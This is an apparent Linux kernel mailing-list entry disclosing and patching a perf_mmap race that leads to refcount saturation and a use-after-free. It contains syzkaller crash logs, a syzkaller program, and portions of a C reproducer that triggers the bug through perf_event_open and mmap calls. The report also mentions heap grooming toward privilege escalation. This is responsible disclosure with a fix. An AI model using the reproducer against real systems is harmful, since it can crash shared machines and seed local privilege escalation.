NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0
{ "author": "Haocheng Yu <yuhaocheng035@gmail.com>", "date": "Sun, 1 Feb 2026 19:34:36 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff) r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8) mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0) r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2) mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0) C reproducer: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <endian.h> #include <setjmp.h> #include <signal.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> #ifndef __NR_pkey_mprotect #define __NR_pkey_mprotect 329 #endif static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, 